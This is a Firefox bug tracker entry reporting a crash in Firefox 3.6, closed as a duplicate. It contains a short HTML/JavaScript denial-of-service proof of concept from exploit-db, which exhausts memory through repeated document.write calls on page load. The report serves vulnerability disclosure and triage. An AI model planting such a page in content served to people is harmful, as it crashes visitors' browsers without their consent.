Closed Bug 546025 Opened 14 years ago Closed 14 years ago

As soon as this code will run, browser will crash.

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Version:
3.6 Branch
Platform:
x86
Windows 7
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 545989

People

(Reporter: maciek.mbhunter, Unassigned)

References

(
URL
)

Details

(Keywords: crash)

Attachments

(1 file)

testcase (crashes on load)
393 bytes, text/html
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6

Exploit Code :
 
 
 
       <html><title>FIREFOX 3.6 DoS VULNERABILITY!</title>
       <script>
       function junk()
       {
       var buff="A";
       for (i=0;i<150;i++)
       {
       buff+=buff+"A";
       document.write(buff+buff);
       }
       }
       </script>
       <body onload="javascript:junk();">
       <FONT COLOR=red SIZE=6><b>PWNED!!!</b></FONT>
       </body>
       </html>

http://www.exploit-db.com/exploits/11428

Reproducible: Always
URL: http://www.exploit-db.com/exploits/11428
Keywords: crash
Version: unspecified → 3.6 Branch
This is just the HTML in the bug description as an attachment for ease of use.

Crashes Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a2pre) Gecko/20100211 Minefield/3.7a2pre (.NET CLR 3.5.30729) on load.

bp-baf1ff2b-1392-4835-b5c1-b06102100213
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: